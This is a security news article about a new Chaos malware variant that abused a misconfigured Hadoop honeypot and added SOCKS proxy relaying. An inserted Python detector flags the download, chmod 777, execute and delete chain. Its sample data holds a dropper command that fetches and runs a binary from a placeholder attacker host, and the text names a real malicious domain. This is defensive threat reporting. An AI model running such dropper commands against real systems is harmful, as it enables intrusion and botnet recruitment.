Emerging Chaos Malware Variant Exploits Cloud Vulnerabilities with Enhanced Proxy Capabilities
Cybersecurity experts have identified a new iteration of the Chaos malware, now targeting misconfigured cloud environments and introducing advanced proxy functionalities. This development signifies a strategic shift in the malware’s operational focus, extending beyond its traditional targets of routers and edge devices.
Initially documented by Lumen Black Lotus Labs in September 2022, Chaos is a cross-platform malware capable of infiltrating both Windows and Linux systems. Its capabilities include executing remote shell commands, deploying additional modules, propagating through SSH key brute-forcing, mining cryptocurrency, and launching distributed denial-of-service (DDoS) attacks via multiple protocols such as HTTP, TLS, TCP, UDP, and WebSocket.
The malware is believed to have evolved from Kaiji, another DDoS-focused malware known for exploiting misconfigured Docker instances. While the exact identity of the operators remains unknown, indicators such as the use of Chinese language characters and China-based infrastructure suggest a possible Chinese origin.
Darktrace’s recent observations revealed that this new Chaos variant targeted their honeypot network, specifically a deliberately misconfigured Hadoop instance vulnerable to remote code execution. The attack began with an HTTP request to the Hadoop deployment, aiming to create a new application. This application contained shell commands designed to download a Chaos agent binary from an attacker-controlled server (pan.tenire[.]com), modify its permissions to allow execution by all users (chmod 777), execute the binary, and subsequently delete the artifact to minimize forensic evidence.
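As an added example (not part of Darktrace's report or this article), the following Python flags the download, chmod 777, execute and delete chain described above when it shows up in the command field of a YARN application submission; the nested field names and the sample bodies are constructed assumptions for this illustration, with a placeholder standing in for the real download host.

```python
import re

# Constructed sample YARN application submissions (not real captures). The
# nesting follows the shape of a YARN ResourceManager "submit application"
# REST body (assumption); the commands and host name are illustrative only.
SAMPLE_SUBMISSIONS = [
    {"application-id": "application_1700000000000_0001",
     "am-container-spec": {"commands": {"command":
         "hadoop jar wordcount.jar /data/in /data/out"}}},
    {"application-id": "application_1700000000000_0002",
     "am-container-spec": {"commands": {"command":
         "curl -o /tmp/.x http://PLACEHOLDER-ATTACKER-HOST/x; chmod 777 /tmp/.x;"
         " /tmp/.x; rm -f /tmp/.x"}}},
]

PATH = r"([^\s;&|]+)"          # one shell word, stopping at separators
END = r"(?=[\s;&|]|$)"         # the path must end as a whole word
FETCH_RE = re.compile(r"\b(?:curl|wget)\b[^;&|]*?\s-[oO]\s+" + PATH)
CHMOD_RE = re.compile(r"\bchmod\s+(?:777|a\+x|\+x)\s+" + PATH)


def chain_stages(command: str) -> list[str]:
    """Name the dropper-chain stages (fetch, chmod, execute, delete) present."""
    stages = []
    fetch = FETCH_RE.search(command)
    if fetch:
        stages.append("fetch")
    chmod = CHMOD_RE.search(command)
    if chmod:
        stages.append("chmod")
    # The path the download wrote, or failing that the chmod target.
    path = fetch.group(1) if fetch else (chmod.group(1) if chmod else None)
    if path:
        p = re.escape(path)
        if re.search(r"(?:^|[;&|])\s*" + p + END, command):  # run as a command
            stages.append("execute")
        if re.search(r"\brm\b[^;&|]*\s" + p + END, command):  # removed afterwards
            stages.append("delete")
    return stages


def flag_submissions(submissions: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (application-id, stages) for every submission showing 3+ stages."""
    hits = []
    for sub in submissions:
        cmd = sub.get("am-container-spec", {}).get("commands", {}).get("command", "")
        stages = chain_stages(cmd)
        if len(stages) >= 3:
            hits.append((sub["application-id"], stages))
    return hits
```

A legitimate job submission yields no stages, while the dropper-style command is reported with all four; the same `chain_stages` check can be applied to container launch scripts or shell audit logs on the NodeManager hosts.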
Notably, the domain pan.tenire[.]com was previously associated with an email phishing campaign by the Chinese cybercrime group Silver Fox, known as Operation Silk Lure, which distributed decoy documents and ValleyRAT malware.
The 64-bit ELF binary of this Chaos variant has undergone significant restructuring, retaining its core functionalities while introducing notable changes. One major modification is the removal of features that facilitated propagation via SSH and exploitation of router vulnerabilities. In their place, a new SOCKS proxy feature has been added, enabling compromised systems to relay traffic. This addition obscures the true origin of malicious activities, complicating detection and mitigation efforts for cybersecurity defenders.
Darktrace’s analysis indicates that several functions previously inherited from Kaiji have been altered, suggesting extensive rewriting or refactoring of the malware. The incorporation of the proxy feature likely reflects the threat actors’ intent to diversify the botnet’s monetization strategies beyond cryptocurrency mining and DDoS-for-hire services. By offering a broader range of illicit services, they aim to remain competitive in the cybercrime market.
The continuous evolution of Chaos underscores the commitment of cybercriminals to expand their botnets and enhance their capabilities. The recent trend of integrating proxy services into botnets like AISURU and Chaos indicates that the threat landscape is evolving, with denial-of-service attacks no longer being the sole concern for organizations and their security teams.